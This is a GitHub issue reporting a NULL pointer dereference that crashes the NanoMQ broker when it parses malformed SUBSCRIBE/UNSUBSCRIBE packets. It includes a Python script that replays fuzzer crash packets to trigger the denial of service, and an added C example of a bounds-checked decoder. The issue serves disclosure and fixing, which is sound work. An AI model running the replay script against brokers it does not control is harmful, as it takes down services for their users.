
Segment Fault occurs due to NULL Pointer reference in subinfo_decode & unsubinfo_decode while broker is parsing mqtt #1038

Closed
realsung opened this issue Feb 7, 2023 · 3 comments · Fixed by nanomq/NanoNNG#428

@realsung

realsung commented Feb 7, 2023

Describe the bug
A segmentation fault (CWE-476, NULL Pointer Dereference) occurred during decoding in subinfo_decode and unsubinfo_decode.

Expected behavior
DoS

Actual Behavior
Describe what occurred.

To Reproduce

import subprocess
import time
import socket

def check_input(input, sleep_time = 0.01):
    # Deliver one raw MQTT packet to the local broker.
    # Returns True once the payload was sent, False if the broker refused
    # the connection (i.e. it is no longer running). The original version
    # returned nothing, so the caller's status check could never fire.
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect(('127.0.0.1', 1883))
            s.send(input)
            s.close()
            delivered = True
            break
        except ConnectionResetError:
            # broker dropped the connection; retry with a fresh socket
            s.close()
            continue
        except ConnectionRefusedError:
            s.close()
            delivered = False
            break

    time.sleep(sleep_time)
    return delivered

def check_crash_log(crash_log):
    # Replay the logged hex packets newest-first until the broker stops answering.
    for c in reversed(crash_log):
        c = c.strip()
        if not c:
            continue
        c_bytes = bytearray.fromhex(c)
        status = check_input(c_bytes, 0.25)
        if status == False:
            print('[+] A crash was detected')
            return c_bytes
    print('[-] No crash..')
    raise SystemExit(1)

with open('target-1675744763.830481.txt', 'r') as f:
    crash_log = f.readlines()

check_crash_log(crash_log)

target file: target-1675744763.830481.txt

Attached images: backtrace (bt); debug output (a1, a2)

Environment Details

  • NanoMQ version : v0.15.0-0

  • Operating system and version : Linux lab-virtual-machine 5.15.0-58-generic x86_64 x86_64 x86_64 GNU/Linux

  • Compiler and language used : I am using the Debugging guide (debug NanoMQ with GDB) option with a ninja compile

  • testing scenario
    Run the broker with the ./nanomq start command, put the target file and the python file in the same path, and run the python script.

Client SDK
Using MQTT Raw Packet

Additional context
Add any other context about the problem here.
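To show the kind of check that prevents this class of crash, here is an added example, not NanoMQ's code and not the reporter's script, of a bounds-checked decoder for the SUBSCRIBE and UNSUBSCRIBE payloads as laid out in MQTT 3.1.1: a 2-byte packet identifier, then repeated topic filters, each a 2-byte length prefix and the topic bytes, followed by a QoS byte for SUBSCRIBE only. Every read is validated against the bytes remaining, so a truncated or malformed packet such as a fuzzer produces is rejected with an error code instead of reaching a NULL or out-of-range pointer. The function names, error codes and sample packets are assumptions made for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example: bounds-checked decoder for MQTT 3.1.1 SUBSCRIBE / UNSUBSCRIBE
 * payloads. Names, error codes and sample packets are assumptions for this
 * example; they are not NanoMQ's own API. */

#define MQTT_MAX_FILTERS 8

typedef struct {
    const uint8_t *topic;   /* points into the caller's buffer, not copied */
    uint16_t       len;
    uint8_t        qos;     /* always 0 for UNSUBSCRIBE */
} mqtt_filter_t;

typedef struct {
    uint16_t      packet_id;
    size_t        count;
    mqtt_filter_t filters[MQTT_MAX_FILTERS];
} mqtt_subscribe_t;

enum {
    SUB_OK             =  0,
    SUB_ERR_NULL       = -1,  /* NULL buffer or output struct */
    SUB_ERR_TRUNCATED  = -2,  /* a field extends past the end of the payload */
    SUB_ERR_NO_FILTERS = -3,  /* protocol requires at least one topic filter */
    SUB_ERR_EMPTY_NAME = -4,  /* zero-length topic filter */
    SUB_ERR_QOS        = -5,  /* requested QoS above 2 */
    SUB_ERR_TOO_MANY   = -6   /* more filters than this decoder accepts */
};

/* Shared worker: with_qos selects the SUBSCRIBE (1) or UNSUBSCRIBE (0) layout.
 * Every access to buf is preceded by a check against the bytes remaining. */
static int decode_payload(const uint8_t *buf, size_t len, int with_qos, mqtt_subscribe_t *out)
{
    if (buf == NULL || out == NULL)
        return SUB_ERR_NULL;
    memset(out, 0, sizeof *out);

    if (len < 2)
        return SUB_ERR_TRUNCATED;
    out->packet_id = (uint16_t)((buf[0] << 8) | buf[1]);
    size_t pos = 2;
    if (pos == len)
        return SUB_ERR_NO_FILTERS;

    while (pos < len) {
        if (len - pos < 2)                      /* need the 2-byte length prefix */
            return SUB_ERR_TRUNCATED;
        uint16_t tlen = (uint16_t)((buf[pos] << 8) | buf[pos + 1]);
        pos += 2;

        size_t need = (size_t)tlen + (with_qos ? 1 : 0);
        if (len - pos < need)                   /* topic bytes (+ QoS) must fit */
            return SUB_ERR_TRUNCATED;
        if (tlen == 0)
            return SUB_ERR_EMPTY_NAME;
        if (out->count >= MQTT_MAX_FILTERS)
            return SUB_ERR_TOO_MANY;

        uint8_t qos = with_qos ? buf[pos + tlen] : 0;
        if (qos > 2)
            return SUB_ERR_QOS;

        out->filters[out->count].topic = buf + pos;
        out->filters[out->count].len   = tlen;
        out->filters[out->count].qos   = qos;
        out->count++;
        pos += need;
    }
    return SUB_OK;
}

int mqtt_subscribe_decode(const uint8_t *buf, size_t len, mqtt_subscribe_t *out)
{
    return decode_payload(buf, len, 1, out);
}

int mqtt_unsubscribe_decode(const uint8_t *buf, size_t len, mqtt_subscribe_t *out)
{
    return decode_payload(buf, len, 0, out);
}

/* Constructed sample payloads (variable header + payload, fixed header stripped). */
const uint8_t sample_sub_ok[]        = {0x00, 0x01, 0x00, 0x03, 'a', '/', 'b', 0x01};
const uint8_t sample_sub_truncated[] = {0x00, 0x01, 0x00, 0x05, 'a'};  /* claims 5 bytes, has 1 */
const uint8_t sample_sub_no_qos[]    = {0x00, 0x01, 0x00, 0x01, 'a'};  /* QoS byte missing */
const uint8_t sample_unsub_ok[]      = {0x00, 0x02, 0x00, 0x01, 'a'};

int main(void)
{
    mqtt_subscribe_t s;
    int rc = mqtt_subscribe_decode(sample_sub_ok, sizeof sample_sub_ok, &s);
    printf("well-formed: rc=%d id=%u filters=%zu qos=%u\n", rc, s.packet_id, s.count, s.filters[0].qos);
    rc = mqtt_subscribe_decode(sample_sub_truncated, sizeof sample_sub_truncated, &s);
    printf("truncated: rc=%d (rejected before any out-of-range read)\n", rc);
    return 0;
}
```

The decoder keeps pointers into the caller's buffer rather than copying, so the caller must keep the packet alive while the result is used; the point of the example is the ordering of checks, each length test happening before the byte it guards is touched.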

@realsung
Author

realsung commented Feb 8, 2023

thanks :) have a good day!

@realsung realsung closed this as completed Feb 8, 2023
@JaylinYu
Member

JaylinYu commented Feb 8, 2023

Hi bro, we really appreciate your efforts in identifying this security issue. We are planning to merge dynamic fuzzing into routine development.
Additionally, we also found other issues by using your fuzzing dataset and will fix them soon.

@JaylinYu
Member

JaylinYu commented Feb 8, 2023

@realsung plz throw us more issues like this!
